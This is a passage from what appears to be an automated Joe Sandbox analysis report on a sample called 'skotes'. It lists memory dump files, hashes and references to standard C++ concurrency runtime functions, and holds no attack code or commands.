                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2033596534-0
                                                                                                                                                                                                                                                  • Opcode ID: 6d5e009ed878f155ca1f282ee7eada13eca00b4fb09f3ec3b035d181262fdcea
                                                                                                                                                                                                                                                  • Instruction ID: 927371b39def04195a05fe23e327577ce65d4897f9ffb9f1651642d47547327a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d5e009ed878f155ca1f282ee7eada13eca00b4fb09f3ec3b035d181262fdcea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B2192759002049FDF04EF69D882E9EBBB4AF15314B20407FF001AB292EB396D01CB59
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0049A069
                                                                                                                                                                                                                                                    • Part of subcall function 0049B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0049B5AF
                                                                                                                                                                                                                                                  • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0049A07F
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0049A0CB
                                                                                                                                                                                                                                                    • Part of subcall function 0049AB41: List.LIBCONCRT ref: 0049AB77
                                                                                                                                                                                                                                                  • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0049A0DB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 932774601-0
                                                                                                                                                                                                                                                  • Opcode ID: ec175e181c0ac5b4b71928a9c67136943483ba02e807ada5b626f2f65f7fb784
                                                                                                                                                                                                                                                  • Instruction ID: f171cdf747bdc345913af2200236c527f904e201fb10e9ca1bc1c35924284357
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec175e181c0ac5b4b71928a9c67136943483ba02e807ada5b626f2f65f7fb784
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C721DC31500B149FCB25EF66D9908ABF7F5FF48314700492EE942A7651CB38F801CBAA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 00494893
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 004948A5
                                                                                                                                                                                                                                                    • Part of subcall function 00495555: _InternalDeleteHelper.LIBCONCRT ref: 00495564
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 004948AF
                                                                                                                                                                                                                                                  • _InternalDeleteHelper.LIBCONCRT ref: 004948C8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3844194624-0
                                                                                                                                                                                                                                                  • Opcode ID: 85c87950620d8e031c290cc927ed79baf1a04ddb0c7223e2509defe8dab3c14c
                                                                                                                                                                                                                                                  • Instruction ID: 3bcc4b36fd715ef2ee0ef5c848c0f6589496e8f554fec7f519d3111b1d2c3386
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85c87950620d8e031c290cc927ed79baf1a04ddb0c7223e2509defe8dab3c14c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D012B716015117FCF11FB56D886E6EBF2ABF84724701043FF40497652DB18EC1287A4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049EE6A
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049EE7C
                                                                                                                                                                                                                                                    • Part of subcall function 0049EF29: _InternalDeleteHelper.LIBCONCRT ref: 0049EF3B
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049EE86
                                                                                                                                                                                                                                                  • _InternalDeleteHelper.LIBCONCRT ref: 0049EE9F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
